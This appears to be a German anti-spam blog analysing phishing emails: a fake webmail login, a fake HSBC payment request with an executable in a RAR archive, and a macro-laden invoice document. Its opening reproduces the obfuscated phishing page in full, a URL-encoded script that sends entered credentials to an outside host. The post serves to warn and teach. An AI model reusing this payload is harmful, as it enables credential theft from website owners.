document.write(unescape('%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%20%3A%3A%20%57%65%6C%63%6F%6D%65%20%74%6F%20%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%73%68%72%69%6E%6B%2D%74%6F%2D%66%69%74%3D%6E%6F%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%63%73%73%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%73%74%79%6C%65%73%2E%63%73%73%22%3E%0A%09%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%22%3E%0A%20%20%20%20%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%20%20%20%09%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%6E%6F%6E%65%3B%0A%7D%0A%40%66%6F%6E%74%2D%66%61%63%65%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%27%46%6F%6E%74%41%77%65%73%6F%6D%65%2D%73%77%61%70%27%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%64%69%73%70%6C%61%79%3A%20%73%77%61%70%3B%0A%20%20%20%20%20%20%73%72%63%3A%20%6C%6F%63%61%6C%28%27%46%6F%6E%74%41%77%65%73%6F%6D%65%27%29%2C%20%75%72%6C%28%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%32%29%20%66%6F%72%6D%61%74%28%27%77%6F%66%66%32%27%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%74%61%73%6B%2D%6C%6F%67%69%6E%20%61%63%74%69%6F%6E%2D%6E%6F%6E%65%22%3E%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%22%3E%0A%20%20%20%20%20%20%20%20%3C%68%31%20%63%6C%61%73%73%3D%22%76%6F%69%63%65%22%3E%67%6C%6F%62%61%6C%70%6F%69%6E%74%2E%65%73%20%57%65%62%6D%61%69%6C%20%4C%6F%67%69%6E%3C%2F%68%31%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%2D%63%6F%6E%74%65%6E%74%22%20%63%6C%61%73%73%3D%22%73%65%6C%65%63%74%65%64%20%6E%6F%2D%6E%61%76%62%61%72%22%20%72%6F%6C%65%3D%22%6D%61%69%6E%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%6D%61%69%6C%2E%6E%6F%76%6F%68%6F%67%61%72%2E%65%73%2F%73%6B%69%6E%73%2F%65%6C%61%73%74%69%63%2F%69%6D%61%67%65%73%2F%6C%6F%67%6F%2E%73%76%67%3F%73%3D%31%36%34%39%32%33%31%33%38%37%22%20%69%64%3D%22%6C%6F%67%6F%22%20%61%6C%74%3D%22%4C%6F%67%6F%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%6E%61%6D%65%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%63%6C%61%73%73%3D%22%70%72%6F%70%66%6F%72%6D%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%67%65%6E%65%72%61%6C%2F%61%70%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%64%61%6E%67%65%72%22%20%69%64%3D%22%6D%73%67%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%49%6E%76%61%6C%69%64%20%50%61%73%73%77%6F%72%64%2E%2E%21%20%50%6C%65%61%73%65%20%65%6E%74%65%72%20%63%6F%72%72%65%63%74%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%69%64%3D%22%65%72%72%6F%72%22%20%63%6C%61%73%73%3D%22%74%65%78%74%2D%64%61%6E%67%65%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%54%68%61%74%20%61%63%63%6F%75%6E%74%20%64%6F%65%73%6E%27%74%20%65%78%69%73%74%2E%20%45%6E%74%65%72%20%61%20%64%69%66%66%65%72%65%6E%74%20%61%63%63%6F%75%6E%74%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%75%73%65%72%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%61%69%22%20%69%64%3D%22%61%69%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%55%73%65%72%6E%61%6D%65%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%70%61%73%73%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%70%72%22%20%69%64%3D%22%70%72%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%66%6F%72%6D%62%75%74%74%6F%6E%73%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%69%64%3D%22%73%75%62%6D%69%74%2D%62%74%6E%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%20%6D%61%69%6E%61%63%74%69%6F%6E%20%73%75%62%6D%69%74%20%62%74%6E%20%62%74%6E%2D%70%72%69%6D%61%72%79%20%62%74%6E%2D%6C%67%20%74%65%78%74%2D%75%70%70%65%72%63%61%73%65%20%77%2D%31%30%30%22%3E%4C%6F%67%69%6E%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%70%3E%0A%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%6F%74%65%72%22%20%72%6F%6C%65%3D%22%63%6F%6E%74%65%6E%74%69%6E%66%6F%22%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%66%6F%72%6D%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%21%2D%2D%20%4F%70%74%69%6F%6E%61%6C%20%4A%61%76%61%53%63%72%69%70%74%20%2D%2D%3E%0A%20%20%20%20%3C%21%2D%2D%20%6A%51%75%65%72%79%20%66%69%72%73%74%2C%20%74%68%65%6E%20%50%6F%70%70%65%72%2E%6A%73%2C%20%74%68%65%6E%20%42%6F%6F%74%73%74%72%61%70%20%4A%53%20%2D%2D%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%33%2E%32%2E%31%2E%73%6C%69%6D%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4B%4A%33%6F%32%44%4B%74%49%6B%76%59%49%4B%33%55%45%4E%7A%6D%4D%37%4B%43%6B%52%72%2F%72%45%39%2F%51%70%67%36%61%41%5A%47%4A%77%46%44%4D%56%4E%41%2F%47%70%47%46%46%39%33%68%58%70%47%35%4B%6B%4E%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%64%6E%6A%73%2E%63%6C%6F%75%64%66%6C%61%72%65%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%70%6F%70%70%65%72%2E%6A%73%2F%31%2E%31%32%2E%39%2F%75%6D%64%2F%70%6F%70%70%65%72%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%41%70%4E%62%67%68%39%42%2B%59%31%51%4B%74%76%33%52%6E%37%57%33%6D%67%50%78%68%55%39%4B%2F%53%63%51%73%41%50%37%68%55%69%62%58%33%39%6A%37%66%61%6B%46%50%73%6B%76%58%75%73%76%66%61%30%62%34%51%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%78%63%64%6E%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%30%2E%30%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4A%5A%52%36%53%70%65%6A%68%34%55%30%32%64%38%6A%4F%74%36%76%4C%45%48%66%65%2F%4A%51%47%69%52%52%53%51%51%78%53%66%46%57%70%69%31%4D%71%75%56%64%41%79%6A%55%61%72%35%2B%37%36%50%56%43%6D%59%6C%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%6A%71%75%65%72%79%2F%32%2E%32%2E%34%2F%6A%71%75%65%72%79%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%73%74%61%63%6B%70%61%74%68%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%31%2E%33%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
</html>
$ _

…ein Javascript-Programm, das ein HTML-Dokument erzeugt. Warum man das nicht direkt in HTML schreibt? Weil man etwas zu verbergen hat, natürlich. Denn selbstverständlich kann man so etwas direkt in HTML schreiben, nur, dass es dann auch jeder ohne Probleme lesen könnte und dass dann Antivirus-Schlangenöle leichtes Spiel haben. So muss ein interessierter Leser ein paar Umwege machen, wenn er neugierig wird. 🛠️

$ cat decr.pl
$l = <>;
$l =~ s/^.*\'([^\']*)\'.*$/\1/;
foreach (split /%/, $l) { printf "%c", hex($_); }
$ cat Rechnung-137784.html | grep unescape | perl decr.pl

Ja, ich weiß: Perl sieht einfach nur schrecklich und unlesbar aus, aber es tippt sich schnell. 😉️

Und nein, so große Umwege sind es nicht. Ich habe mir schon Schlimmeres angeschaut. Aber es übersteigt eben die Kenntnisse gewöhnlicher Anwender erheblich. Und das ist der Zweck der Übung. 🎭️

Ich erspare hier jetzt mal die 4546 Byte lange HTML-Ausgabe dieses winzigen Skriptes und komme auf den Punkt. Man soll im generierten Dokument einen Usernamen und ein Passwort angeben. Diese werden jedoch nicht zu HostEurope gesendet, sondern zu einer Website in der Domain mailbusinessionos (punkt) com, die ganz sicher nichts mit HostEurope zu tun hat. (Der Hoster war inzwischen so nett, dieser Phishing-Site den Stecker zu ziehen.) Danach haben kriminelle Phisher die Zugangsdaten für das Webhosting anderer Leute, und sie werden dort alles tun, was ein gutes Geschäft für kriminelle Phisher ist: Vom Betrugsshop über weiteres Phishing bis hin zu Darstellungen sexuellen Kindesmissbrauchs. Und wer hat für diese Verbrechen die Kriminalpolizei vor der Tür stehen? Richtig: Die arme Seele von Domaininhaber und Website-Betreiber, die auf ein Phishing reingefallen ist. 🎣️

Sollten Sie Fragen zu Ihrer Rechnung oder Ihrem Vertrag haben, helfe ich Ihnen gerne weiter.

Wer sich fragt, wie man verhindern kann, auf so etwas reinzufallen: Das ist sehr einfach, und man braucht dafür weder spezielle Software noch muss man besondere Kenntnisse haben. Niemals in eine E-Mail klicken! Auch nicht, um einen Anhang zu öffnen! Wenn man solche Websites wie die seiner Bank, seines Händlers, seines Webhosters etc. als Lesezeichen im Webbrowser ablegt und nur über das Lesezeichen im Webbrowser aufruft, kann einem kein Krimineller einen vergifteten Link unterschieben. Nach einer solchen Mail einfach die Website über das Lesezeichen aufrufen. Dieses bisschen Vorsicht, das nichts kostet und mit keinem Komfortverlust verbunden ist, kann viel Geld und jahrelangen Ärger ersparen. Und es ist sehr einfach. Aber das erwähnte ich ja schon. 🛡️

Also: Lasst die Phisher verhungern! Keiner vermisst sie. ⚰️

Ihr

Host Europe GmbH
Kundenservice

Host Europe GmbH • Hansestr. 111 • 51149 Köln •
Gerichtsstand: HRB 28495 • Amtsgericht Köln • Umsatzsteuer.-ID: DE187370678
Geschäftsführer: Paul Ashcroft, Tim Montag, Michele Lau, Nicholas Daddario

Wie schon gesagt: HostEurope hat mit dieser Spam nichts zu tun.

Euer Nachtwächter!

Diese Phishing-Spam aus dem täglichen Klo ist ein Zustecksel meines Lesers A. H.

Fwd: TOP URGENT_ PAYMENT INSTRUCTION,

Montag, 27. September 2021

Wie, soll ich mal wieder betrogen werden?

Good day,

Should we proceed payment to this account in the attached invoice?

The below invoice was forwarded to the account department this morning by our sales department.

Check the attached Invoice and confirm for a final confirmation of the details for the payment

Thanks & Regards

ACCOUNT MANAGER

HSBC Bank USA, N.A.
P.O. Box 0021

Buffalo, NY 14240

Phone: +971 6 764■■■■

Fax: +971 6 764■■■■

Nein, ich, der ich von meiner Mutter mit dem Namen „Guten Tag“ gestraft wurde, soll einen Mailanhang aufmachen, in dem angeblich eine Rechnung liegt. Und in der Tat: Die Mail hat einen Anhang…

$ file payment\ 001.r00 
payment 001.r00: RAR archive data, v4, os: Win32
$ rar l payment\ 001.r00 

RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Archive: payment 001.r00
Details: RAR 4

 Attributes      Size     Date    Time   Name
----------- ---------  ---------- -----  ----
    ..A....    779776  2021-09-27 01:45  $$$.exe
----------- ---------  ---------- -----  ----
               779776                    1

$ _

…und dieser ist keine Rechnung, sondern ein RAR-Archiv. In diesem Archiv befindet sich kein Dokument, was schon gefährlich genug wäre, sondern eine ausführbare Datei für Microsoft Windows. Wer das Archiv auspackt und auf diese Datei einen Doppelklick macht, führt Software von spammenden Verbrechern aus und hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen oder im schlimmsten Fall alle Computer eines Firmennetzwerkes an Kriminelle übergeben. Deshalb klickt man ja auch nicht auf solche Dateien aus einem Mailanhang.

Das Antivirus-Schlangenöl wird in vielen Fällen nicht helfen. Zurzeit wird die klare Schadsoftware nur von einem guten Siebtel der Programme für die gefühlte Computersicherheit als klare Schadsoftware erkannt und behandelt.

Wer sich hingegen angewöhnt, nicht in E-Mail zu klicken und niemals einen E-Mail-Anhang zu öffnen, der nicht vorher über einen anderen Kanal als E-Mail vereinbart wurde, ist auf der sicheren Seite. Der Absender einer E-Mail ist übrigens nichts wert. Da kann jeder eintragen, was er will. Deshalb gibt es ja auch digitale Signatur, um wenigstens sicherzustellen, dass der Absender einen bestimmten privaten Schlüssel hat, aber diese über dreißig Jahre alte und völlig kostenlos anzuwendende Technik will sich nicht durchsetzen, weil man dafür klicken können muss. 🙁

Meine Prognose, obwohl ich es nicht weiß: Auch unter Windows 11, dem Nachfolger der letzten Windows-Version, die Microsoft jemals machen wollte, wird in den Standardeinstellungen die Dateinamenserweiterung ausgeblendet sein, so dass der Anwender den Unterschied zwischen einem PDF-Dokument und einer ausführbaren Datei, deren Piktogramm das Piktogramm eines PDF-Dokumentes ist nicht wahrnehmen kann. Keine andere schlechte Entscheidung Microsofts aus den Neunziger Jahren hat dermaßen viel Schaden angerichtet. 🙁

Danke für Ihre Bestellung!

Donnerstag, 29. Oktober 2020

⚠️ WARNUNG! Auf gar keinen Fall den Anhang solcher Rechnungen öffnen. Es ist das reinste Gift für den Computer.

Von: Gretel Baumhauer <info@balt-development.online>

Natürlich ist die Absenderadresse gefälscht, und sie ist nicht einmal so gefälscht…

Sie haben eine Nachricht vom cellonic.com

…das sie so aussieht, als käme sie vom vorgeblichen Absender. Die armen Seelen, die jetzt die Rückläufer auf der falschen Absenderadresse bekommen, tun mir leid.

Bestellnummer 303-3903773-1119531

Zahlen sehen ja immer sehr wichtig aus. Also kann man mal eben rasch Zahlen reinschreiben, obwohl die gar nichts sagen. Ich habe auch ganz viele Zahlen, wenn das sein muss:

$ for i in $(seq 1 5); do echo $i. $RANDOM-$RANDOM$RANDOM-$RANDOM; done
1. 18059-3076913794-12615
2. 19731-2579621933-30405
3. 19655-247087743-22924
4. 12797-3168413414-14016
5. 5914-2463332599-18021
$ _

Voll überzeugend, nicht wahr? Und ich kann ganz viele davon machen. 😉

Anzahl Produktname und ASIN

Apple iPhone XR (64GB) – (PRODUCT)BLACK
ASIN: B07TW2MY3C
Lieferkosten Gratis
Zwischensumme 762,85 €

Schön, dass die angebliche Lieferung nichts kostet. :mrgreen:

Hallo

Genau mein Name! 👏

Vielen Dank für Ihren Einkauf in unserem Shop.

Aber ich habe nichts eingekauft. 🛒

Die Rechnung wurde Ihnen in einem Anhang zugesandt. Überprüfen Sie bitte das.

Leider stand nicht mehr genug Mailpapier zur Verfügung, so dass in der Mail weder eine Kontonummer noch sonst etwas steht, so dass man in eine Spam klicken soll, wenn man wissen will, um was es sich handelt. Diese Überraschungseier sind ja auch ein Erfolgsprodukt, da kann man das auch mit E-Mail machen. 🥚

Wenn Sie Fragen haben, kontaktieren Sie uns bitte so schnell wie möglich.

Eine Telefonnummer für Rückfragen ist nicht in der Mail angegeben. Wenn man wissen möchte, wohin man seine Frage so schnell wie möglich stellen kann, muss man wiederum den Anhang aufmachen. 💀

Der Anhang ist…

$ ls -lh *.doc
-rw-rw-r-- 1 elias elias 958K Okt 29 13:50 'Zahlungsrechnung für Ihre Bestellung.doc'
$ file *.doc | sed 's/,/\n/g'
Zahlungsrechnung für Ihre Bestellung.doc: Composite Document File V2 Document
 Little Endian
 Os: Windows
 Version 10.0
 Code page: 1251
 Title:  
 Author: Clinical Trial Services
 Template: Normal.dotm
 Last Saved By: 1
 Revision Number: 82
 Name of Creating Application: Microsoft Office Word
 Total Editing Time: 02:45:00
 Last Printed: Mon Apr  9 07:08:00 2001
 Create Time/Date: Fri Apr  6 09:07:00 2001
 Last Saved Time/Date: Thu Oct 29 07:31:00 2020
 Number of Pages: 1
 Number of Words: 6
 Number of Characters: 36
$ _

…ein Dokument für Microsoft Word aus dem Jahr 2001, das in seinem fast ein Megabyte Dokumentgröße nur sechs Wörter und 36 Zeichen enthält, also ganz sicher keinen Aufschluss über meine angebliche Bestellung oder über die Bankverbindung gibt, zu der ich das Geld überweisen soll. Es geht da um etwas ganz anders, nämlich…

Screenshot des Dialogfensters, das beim Öffnen des Dokumentes mit Libre Office angezeigt wird. -- Dieses Dokument enthält Makros. -- Makros können Viren enthalten. Die Ausführung dieser Makros wird aufgrund der aktuellen Makrosicherheits-Einstellung unter Extras - Optionen - LibreOffice-Sicherheit unterbunden. -- Manche Funktionen stehen daher möglicherweise nicht zur Verfügung. -- [OK]

